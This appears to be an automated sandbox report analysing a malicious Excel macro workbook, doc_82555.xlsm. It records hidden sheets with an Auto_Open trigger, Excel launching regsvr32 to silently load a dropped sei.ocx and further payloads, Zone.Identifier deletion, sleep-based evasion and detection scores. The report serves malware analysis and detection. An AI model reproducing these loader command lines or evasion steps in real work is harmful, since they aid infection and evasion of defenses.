Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10013CDD	5_2_10013CDD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_100088E5	5_2_100088E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10021AE9	5_2_10021AE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001BAF2	5_2_1001BAF2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_100018F6	5_2_100018F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10003F09	5_2_10003F09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10001B09	5_2_10001B09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000BB23	5_2_1000BB23
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001692B	5_2_1001692B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001112D	5_2_1001112D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10001930	5_2_10001930
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10009133	5_2_10009133
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001C535	5_2_1001C535
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10004342	5_2_10004342
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000DB59	5_2_1000DB59
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10015D68	5_2_10015D68
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001C16B	5_2_1001C16B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000E379	5_2_1000E379
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10010F7A	5_2_10010F7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10009B80	5_2_10009B80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000F784	5_2_1000F784
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001B384	5_2_1001B384
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10019184	5_2_10019184
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10007786	5_2_10007786
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001E18B	5_2_1001E18B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10005995	5_2_10005995
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10007599	5_2_10007599
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10011DA6	5_2_10011DA6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_100195A8	5_2_100195A8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001AFB0	5_2_1001AFB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10004BB4	5_2_10004BB4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_100141CF	5_2_100141CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000C7D1	5_2_1000C7D1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_100147D2	5_2_100147D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_100227DF	5_2_100227DF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_100151E8	5_2_100151E8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_100203F2	5_2_100203F2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_100213FD	5_2_100213FD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001E612	6_2_1001E612
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10010418	6_2_10010418
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000A01C	6_2_1000A01C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1002225A	6_2_1002225A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10017473	6_2_10017473
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000508B	6_2_1000508B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10005C9A	6_2_10005C9A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001EAA3	6_2_1001EAA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001D6B1	6_2_1001D6B1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_100066B0	6_2_100066B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_100072CC	6_2_100072CC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10013CDD	6_2_10013CDD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001112D	6_2_1001112D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001D14C	6_2_1001D14C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10015D68	6_2_10015D68
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000E379	6_2_1000E379
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10007786	6_2_10007786
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10005995	6_2_10005995
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_100141CF	6_2_100141CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10011FD0	6_2_10011FD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_100227DF	6_2_100227DF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_100203F2	6_2_100203F2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_100109F9	6_2_100109F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000B200	6_2_1000B200
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000BE09	6_2_1000BE09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001DE11	6_2_1001DE11
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001B215	6_2_1001B215
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10009617	6_2_10009617
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10021E19	6_2_10021E19
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001882F	6_2_1001882F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000F43B	6_2_1000F43B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001F24C	6_2_1001F24C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10003C51	6_2_10003C51
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001F060	6_2_1001F060
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10001865	6_2_10001865
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1002086F	6_2_1002086F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10020E6D	6_2_10020E6D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10004E77	6_2_10004E77
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10002279	6_2_10002279
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10008C7C	6_2_10008C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10010C7C	6_2_10010C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001B687	6_2_1001B687
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10006A8D	6_2_10006A8D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10015497	6_2_10015497
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10010097	6_2_10010097
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000D899	6_2_1000D899
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001EC9B	6_2_1001EC9B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_100116AD	6_2_100116AD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001A4B5	6_2_1001A4B5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10006CBB	6_2_10006CBB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000CED8	6_2_1000CED8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001DAD8	6_2_1001DAD8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_100088E5	6_2_100088E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10021AE9	6_2_10021AE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001BAF2	6_2_1001BAF2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_100018F6	6_2_100018F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000B4FC	6_2_1000B4FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10004700	6_2_10004700
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10003F09	6_2_10003F09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10001B09	6_2_10001B09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1002110E	6_2_1002110E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10003511	6_2_10003511
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000BB23	6_2_1000BB23
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001692B	6_2_1001692B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10001930	6_2_10001930
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10009133	6_2_10009133
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001C535	6_2_1001C535
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10004342	6_2_10004342
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000D346	6_2_1000D346
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000DB59	6_2_1000DB59
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001C16B	6_2_1001C16B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10010F7A	6_2_10010F7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10009B80	6_2_10009B80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000F784	6_2_1000F784
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001B384	6_2_1001B384
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10019184	6_2_10019184
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001E18B	6_2_1001E18B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10007599	6_2_10007599
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10011DA6	6_2_10011DA6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_100195A8	6_2_100195A8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000E1A9	6_2_1000E1A9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001AFB0	6_2_1001AFB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10004BB4	6_2_10004BB4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000C7D1	6_2_1000C7D1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_100147D2	6_2_100147D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000F1D5	6_2_1000F1D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_100151E8	6_2_100151E8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_100163F0	6_2_100163F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_100213FD	6_2_100213FD

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 6DA5C80D appears 111 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 6DA44790 appears 31 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 6DA5C840 appears 40 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 6DA5C918 appears 49 times

Source: doc_82555.xlsm	Macro extractor: Sheet name: Je1
Source: doc_82555.xlsm	Macro extractor: Sheet name: Je2
Source: doc_82555.xlsm	Macro extractor: Sheet name: EFALGV
Source: doc_82555.xlsm	Macro extractor: Sheet name: EFALGV
Source: doc_82555.xlsm	Macro extractor: Sheet name: Je1

Source: ouyGhPOm[1].dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sei.ocx.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: workbook.xml

Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22527"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\File\1mar\CIR-ZV\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{BB1DE8A2-6C62-497D-9C8A-3A65EB24A263}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" firstSheet="1" activeTab="1" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Vfrbuk1" sheetId="2" state="hidden" r:id="rId1"/><sheet name="Sheet" sheetId="8" r:id="rId2"/><sheet name="Lefasbor1" sheetId="3" state="hidden" r:id="rId3"/><sheet name="EFALGV" sheetId="4" state="hidden" r:id="rId4"/><sheet name="Je1" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Je2" sheetId="6" state="hidden" r:id="rId6"/></sheets><definedNames><definedName name="DDDDD1">#REF!</definedName><definedName name="DDWD">#REF!</definedName><definedName name="DDWD1">#REF!</definedName><definedName name="DDWD2">#REF!</definedName><definedName name="DDWD3">#REF!</definedName><definedName name="DDWD4">#REF!</definedName><definedName name="GFGH1">EFALGV!$D$10</definedName><definedName name="GFGH2">EFALGV!$D$12</definedName><definedName name="GFGH3">EFALGV!$D$14</definedName><definedName name="GFGH4">EFALGV!$D$16</definedName><definedName name="GFGH5">EFALGV!$D$18</definedName><definedName name="GFGH6">EFALGV!$D$20</definedName><definedName name="KKLD8">#REF!</definedName><definedName name="_xlnm.Auto_Open">EFALGV!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: doc_82555.xlsm	Virustotal: Detection: 43%
Source: doc_82555.xlsm	Metadefender: Detection: 20%
Source: doc_82555.xlsm	ReversingLabs: Detection: 61%

Source: C:\Windows\SysWOW64\regsvr32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bvzagchljm\dwkzewjivpn.djh"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Cfuxhhimriog\usertmslb.fpr"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Mgmxxtvaciu\fmyrhviayqbjkvb.voe"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bvzagchljm\dwkzewjivpn.djh"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Cfuxhhimriog\usertmslb.fpr"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Mgmxxtvaciu\fmyrhviayqbjkvb.voe"	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$doc_82555.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD0D5.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSM@9/9@2/41

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 6_2_1000B34C CreateToolhelp32Snapshot,

6_2_1000B34C

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_6DA3BAD0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z,

3_2_6DA3BAD0

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: doc_82555.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: doc_82555.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: doc_82555.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
Source: doc_82555.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: doc_82555.xlsm	Initial sample: OLE zip file path = xl/calcChain.xml

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA5C95D push ecx; ret		3_2_6DA5C970
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA5C8E5 push ecx; ret		3_2_6DA5C8F8

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_6DA697B9 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

3_2_6DA697B9

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\sei.ocx	Jump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exe	File created: C:\Windows\SysWOW64\Bvzagchljm\dwkzewjivpn.djh (copy)	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ouyGhPOm[1].dll	Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\Windows\SysWOW64\Bvzagchljm\dwkzewjivpn.djh (copy)

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\sei.ocx

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\sei.ocx

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Bvzagchljm\dwkzewjivpn.djh:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Cfuxhhimriog\usertmslb.fpr:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Mgmxxtvaciu\fmyrhviayqbjkvb.voe:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA3DF76 IsIconic,GetWindowPlacement,GetWindowRect,		3_2_6DA3DF76
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA3D310 IsIconic,		3_2_6DA3D310

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2256	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2584	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1724	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1916	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_3-32878

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ouyGhPOm[1].dll

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

API coverage: 4.7 %

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_6DA5CD81 VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,

3_2_6DA5CD81

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA4CD09 __EH_prolog3_GS,GetFullPathNameA,_DebugHeapAllocator,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,_DebugHeapAllocator,		3_2_6DA4CD09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000FE4B FindFirstFileW,		6_2_1000FE4B

Source: C:\Windows\SysWOW64\regsvr32.exe	API call chain: ExitProcess graph end node			graph_3-33186
Source: C:\Windows\SysWOW64\regsvr32.exe	API call chain: ExitProcess graph end node			graph_3-33122

Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: regsvr32.exe, 00000005.00000002.435635755.000000000041B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_6DA59DE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_6DA59DE2

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_6DA5CD81 VirtualProtect ?,-00000001,00000104,?

3_2_6DA5CD81

Source: C:\Windows\SysWOW64\regsvr32.exe

3_2_6DA697B9

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_6DA2A720 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,memcpy,

3_2_6DA2A720

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001AA52 mov eax, dword ptr fs:[00000030h]	3_2_1001AA52
